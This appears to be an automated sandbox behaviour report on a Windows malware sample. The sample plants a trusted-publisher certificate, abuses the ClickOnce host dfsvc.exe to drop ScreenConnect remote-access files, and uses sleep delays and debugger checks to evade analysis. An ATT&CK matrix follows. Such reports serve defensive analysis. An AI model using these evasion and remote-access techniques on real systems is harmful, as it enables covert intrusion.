      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 2AEEE580000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 2AEEFEC0000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 1822Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2607Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.ClientService.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Client.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsFileManager.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.ClientService.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Core.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsClient.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Windows.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe TID: 6640Thread sleep time: -40000s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6872Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6956Thread sleep time: -130350s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6872Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F24B9B FindFirstFileExA,0_2_00F24B9B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeThread delayed: delay time: 40000Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF370D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: dfsvc.exe, 00000001.00000002.2778707559.000002AEF0580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F21920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F21920
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F237C7 mov eax, dword ptr fs:[00000030h]0_2_00F237C7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F269E3 GetProcessHeap,0_2_00F269E3
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F21493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F21493
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F21920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F21920
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F246C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F246C3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F21AAD SetUnhandledExceptionFilter,0_2_00F21AAD
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
      Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
      Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
      Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
      Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
      Source: ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
      Source: ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Windows.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Core.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F21807 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F21807
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
      Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 6712, type: MEMORYSTR
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsClient.exe, type: DROPPED
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Command and Scripting Interpreter
      1
      Scheduled Task/Job
      2
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      21
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Scheduled Task/Job
      1
      Bootkit
      1
      Scheduled Task/Job
      1
      Modify Registry
      LSASS Memory21
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts11
      Native API
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      21
      Disable or Modify Tools
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook31
      Virtualization/Sandbox Evasion
      NTDS31
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture3
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Process Injection
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Hidden Users
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Obfuscated Files or Information
      DCSync14
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Bootkit
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      Install Root Certificate
      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
      Timestomp
      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
      DLL Side-Loading
      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.